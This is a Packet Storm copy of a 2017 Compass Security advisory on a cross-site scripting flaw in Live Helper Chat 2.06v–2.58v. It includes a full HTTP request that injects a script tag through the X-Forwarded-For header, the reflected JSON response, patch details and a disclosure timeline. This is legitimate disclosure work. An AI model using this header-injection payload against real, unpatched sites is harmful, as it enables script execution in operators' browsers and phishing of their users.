Twenty Year Anniversary

Live Helper Chat 2.58v Cross Site Scripting

Live Helper Chat 2.58v Cross Site Scripting
Posted Apr 27, 2017
Authored by Sylvain Heiniger

Live Helper Chat versions 2.06v through 2.58v suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | eac74b8c82e6af650a63fda1f1be2590

Live Helper Chat 2.58v Cross Site Scripting

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#############################################################
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor: Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Sylvain Heiniger (sylvain.heiniger@compass-security.com)
# Date: April 24, 2017
#
#############################################################


Introduction:
----------------
Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [1]

Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code in
the browser of a user. This allows, for instance, attacking the user's browser
or redirecting the user to a phishing website. The attack will be in some cases
automatically run in the backend operator's session. Otherwise, one can send
the victim a link to the website with the malicious payload.


Affected Versions:
-----------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]


Patches:
-----------
Live Helper Chat released a patch as part of release 2.60v [3, 4].


Technical Description:
-----------------------------
Live Helper Chat detects the visitor's IP address. To this end, it reads the
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this
header. It will be reflected in the administrator's "online users" information
page as well as in the "print chat" page.

User's request:
===============
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);</script>
Connection: close
Content-Length: 188

Username=Example&Question=My+question&user_timezone=2&URLRefer=%2F%2Flocalhost%2F&r=&operator=0&StartChat=1&captcha_1977271e431742414c31477d258028664d713ae0=1475518554&tscaptcha=1475518554
===============

Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with:
===============
[{"id":"1","ip":"<script>alert(1);<\/script>","vid":"47428qicplsqmfe9huq2", [JSON MESSAGE CUT]
===============

Note: the above JSON response is sent by the application with the content-type text/html,
making it vulnerable to XSS as is.


Milestones:
---------------
2017-03-14: Vulnerability discovered
2017-04-23: Vendor notified
2017-04-23: Vendor provided patched version
2017-04-28: Public disclosure


References:
---------------
[1] https://github.com/LiveHelperChat/livehelperchat/
[2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f52098d578883ef8d069313d460ec
[3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html
[4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fed613c5e306152ea60255edba2

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    7 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close